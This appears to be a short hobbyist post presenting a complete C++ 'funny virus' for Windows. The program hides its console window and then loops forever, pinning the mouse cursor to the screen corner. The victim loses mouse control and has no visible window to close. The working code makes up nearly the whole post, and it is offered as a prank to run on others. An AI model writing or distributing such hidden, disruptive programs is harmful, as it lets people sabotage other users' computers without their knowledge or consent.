Funny virus in c++
Creating a funny virus in C++ this is a small funny c++ virus which will block your mouse movement the program it is so simple #define _WIN32_WINNT 0x0500 #include<iostream> #include<windows.h> using namespace std; int main (){ HWND hWind = GetConsoleWindow (); ShowWindow ( hWind, SW_HIDE ); while ( 1 ){ SetCursorPos ( 0 , 0 ); } return 0 ; }